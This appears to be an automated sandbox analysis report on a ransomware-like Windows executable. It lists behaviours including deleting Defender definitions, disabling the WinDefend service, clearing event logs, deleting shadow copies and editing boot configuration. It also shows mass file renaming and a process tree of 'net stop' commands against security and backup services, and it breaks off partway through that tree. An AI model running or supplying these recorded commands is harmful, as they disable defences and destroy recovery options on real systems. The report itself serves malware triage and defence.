Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 16:26
Static task
static1
Behavioral task
behavioral1
Sample
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
Resource
win7-en-20211208
General
-
Target
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
-
Size
3.8MB
-
MD5
32bd8e6843879a761e6fa9436a90bb66
-
SHA1
26dde522d6f3f87ac982495028494c7f50799696
-
SHA256
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177
-
SHA512
c7e437c61980385ce57fe2a0dc0988aeba4609ac1ac7b7c07951c10c6bc38772c7ad1442571ab6409c8ea04991844e7ad95b5a9b35e31996f7aad9db4020716f
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2060 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 396 bcdedit.exe 1868 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exedescription ioc process File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\NextMenuButtonIcon.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105246.WMF.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS_COL.HXC.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152414.WMF.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00640_.WMF.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_pressed.gif.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSHY7EN.LEX.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\whitevignette1047.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Windows Media Player\es-ES\mpvis.dll.mui 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\ONENOTE.HXS.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME26.CSS.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESN.CFG.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR5F.GIF.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\6.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Fortaleza.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTO\ActionsPane3.xsd.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00482_.WMF.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0195812.WMF.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST7MDT.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PSWAVY.WMF.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18244_.WMF.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLOOK_COL.HXT.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\js\calendar.js 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.TW.XML.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-4.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssLogo.gif 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Common Files\System\ado\msadox28.tlb 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Iqaluit.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office64.en-us\Office64MUI.XML.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Winnipeg.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099197.GIF.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\background.gif.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GreenTea.css.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\about.html.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Nairobi.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Metro.xml.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\UTILITY.ACCDA.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_cloudy.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\7-Zip\Lang\az.txt.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nome.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\RSSFeeds.css 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\css\weather.css 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_ON.GIF.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-previous-static.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ECHO\THMBNAIL.PNG.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107482.WMF.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02022_.WMF.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143743.GIF.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Faroe.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_right_mouseout.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105338.WMF.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\ParentMenuButtonIconSubpict.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14791_.GIF.1-fKY5lXdu1z6P_7NETFzhrpX1LagPZY36ywPGNs1Nf_IAAAACAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1708 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exe87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exepid process 2092 powershell.exe 2184 powershell.exe 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1904 wevtutil.exe Token: SeBackupPrivilege 1904 wevtutil.exe Token: SeSecurityPrivilege 436 wevtutil.exe Token: SeBackupPrivilege 436 wevtutil.exe Token: SeSecurityPrivilege 1604 wevtutil.exe Token: SeBackupPrivilege 1604 wevtutil.exe Token: SeIncreaseQuotaPrivilege 524 wmic.exe Token: SeSecurityPrivilege 524 wmic.exe Token: SeTakeOwnershipPrivilege 524 wmic.exe Token: SeLoadDriverPrivilege 524 wmic.exe Token: SeSystemProfilePrivilege 524 wmic.exe Token: SeSystemtimePrivilege 524 wmic.exe Token: SeProfSingleProcessPrivilege 524 wmic.exe Token: SeIncBasePriorityPrivilege 524 wmic.exe Token: SeCreatePagefilePrivilege 524 wmic.exe Token: SeBackupPrivilege 524 wmic.exe Token: SeRestorePrivilege 524 wmic.exe Token: SeShutdownPrivilege 524 wmic.exe Token: SeDebugPrivilege 524 wmic.exe Token: SeSystemEnvironmentPrivilege 524 wmic.exe Token: SeRemoteShutdownPrivilege 524 wmic.exe Token: SeUndockPrivilege 524 wmic.exe Token: SeManageVolumePrivilege 524 wmic.exe Token: 33 524 wmic.exe Token: 34 524 wmic.exe Token: 35 524 wmic.exe Token: SeIncreaseQuotaPrivilege 1932 wmic.exe Token: SeSecurityPrivilege 1932 wmic.exe Token: SeTakeOwnershipPrivilege 1932 wmic.exe Token: SeLoadDriverPrivilege 1932 wmic.exe Token: SeSystemProfilePrivilege 1932 wmic.exe Token: SeSystemtimePrivilege 1932 wmic.exe Token: SeProfSingleProcessPrivilege 1932 wmic.exe Token: SeIncBasePriorityPrivilege 1932 wmic.exe Token: SeCreatePagefilePrivilege 1932 wmic.exe Token: SeBackupPrivilege 1932 wmic.exe Token: SeRestorePrivilege 1932 wmic.exe Token: SeShutdownPrivilege 1932 wmic.exe Token: SeDebugPrivilege 1932 wmic.exe Token: SeSystemEnvironmentPrivilege 1932 wmic.exe Token: SeRemoteShutdownPrivilege 1932 wmic.exe Token: SeUndockPrivilege 1932 wmic.exe Token: SeManageVolumePrivilege 1932 wmic.exe Token: 33 1932 wmic.exe Token: 34 1932 wmic.exe Token: 35 1932 wmic.exe Token: SeIncreaseQuotaPrivilege 1932 wmic.exe Token: SeSecurityPrivilege 1932 wmic.exe Token: SeTakeOwnershipPrivilege 1932 wmic.exe Token: SeLoadDriverPrivilege 1932 wmic.exe Token: SeSystemProfilePrivilege 1932 wmic.exe Token: SeSystemtimePrivilege 1932 wmic.exe Token: SeProfSingleProcessPrivilege 1932 wmic.exe Token: SeIncBasePriorityPrivilege 1932 wmic.exe Token: SeCreatePagefilePrivilege 1932 wmic.exe Token: SeBackupPrivilege 1932 wmic.exe Token: SeRestorePrivilege 1932 wmic.exe Token: SeShutdownPrivilege 1932 wmic.exe Token: SeDebugPrivilege 1932 wmic.exe Token: SeSystemEnvironmentPrivilege 1932 wmic.exe Token: SeRemoteShutdownPrivilege 1932 wmic.exe Token: SeUndockPrivilege 1932 wmic.exe Token: SeManageVolumePrivilege 1932 wmic.exe Token: 33 1932 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1580 wrote to memory of 1248 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1580 wrote to memory of 1248 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1580 wrote to memory of 1248 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1248 wrote to memory of 2044 1248 net.exe net1.exe PID 1248 wrote to memory of 2044 1248 net.exe net1.exe PID 1248 wrote to memory of 2044 1248 net.exe net1.exe PID 1580 wrote to memory of 672 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1580 wrote to memory of 672 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1580 wrote to memory of 672 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 672 wrote to memory of 2040 672 net.exe net1.exe PID 672 wrote to memory of 2040 672 net.exe net1.exe PID 672 wrote to memory of 2040 672 net.exe net1.exe PID 1580 wrote to memory of 1096 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1580 wrote to memory of 1096 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1580 wrote to memory of 1096 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1096 wrote to memory of 528 1096 net.exe net1.exe PID 1096 wrote to memory of 528 1096 net.exe net1.exe PID 1096 wrote to memory of 528 1096 net.exe net1.exe PID 1580 wrote to memory of 1492 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1580 wrote to memory of 1492 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1580 wrote to memory of 1492 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1492 wrote to memory of 620 1492 net.exe net1.exe PID 1492 wrote to memory of 620 1492 net.exe net1.exe PID 1492 wrote to memory of 620 1492 net.exe net1.exe PID 1580 wrote to memory of 1744 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1580 wrote to memory of 1744 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1580 wrote to memory of 1744 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1744 wrote to memory of 1360 1744 net.exe net1.exe PID 1744 wrote to memory of 1360 1744 net.exe net1.exe PID 1744 wrote to memory of 1360 1744 net.exe net1.exe PID 1580 wrote to memory of 1872 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1580 wrote to memory of 1872 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1580 wrote to memory of 1872 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1872 wrote to memory of 1072 1872 net.exe net1.exe PID 1872 wrote to memory of 1072 1872 net.exe net1.exe PID 1872 wrote to memory of 1072 1872 net.exe net1.exe PID 1580 wrote to memory of 1216 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1580 wrote to memory of 1216 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1580 wrote to memory of 1216 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1216 wrote to memory of 1092 1216 net.exe net1.exe PID 1216 wrote to memory of 1092 1216 net.exe net1.exe PID 1216 wrote to memory of 1092 1216 net.exe net1.exe PID 1580 wrote to memory of 1544 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1580 wrote to memory of 1544 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1580 wrote to memory of 1544 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1544 wrote to memory of 1192 1544 net.exe net1.exe PID 1544 wrote to memory of 1192 1544 net.exe net1.exe PID 1544 wrote to memory of 1192 1544 net.exe net1.exe PID 1580 wrote to memory of 1208 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 1580 wrote to memory of 1208 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 1580 wrote to memory of 1208 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 1580 wrote to memory of 1780 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 1580 wrote to memory of 1780 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 1580 wrote to memory of 1780 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 1580 wrote to memory of 864 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 1580 wrote to memory of 864 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 1580 wrote to memory of 864 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 1580 wrote to memory of 1956 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 1580 wrote to memory of 1956 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 1580 wrote to memory of 1956 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 1580 wrote to memory of 1720 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 1580 wrote to memory of 1720 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 1580 wrote to memory of 1720 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 1580 wrote to memory of 1884 1580 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe"C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:2044
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:672 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:2040
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
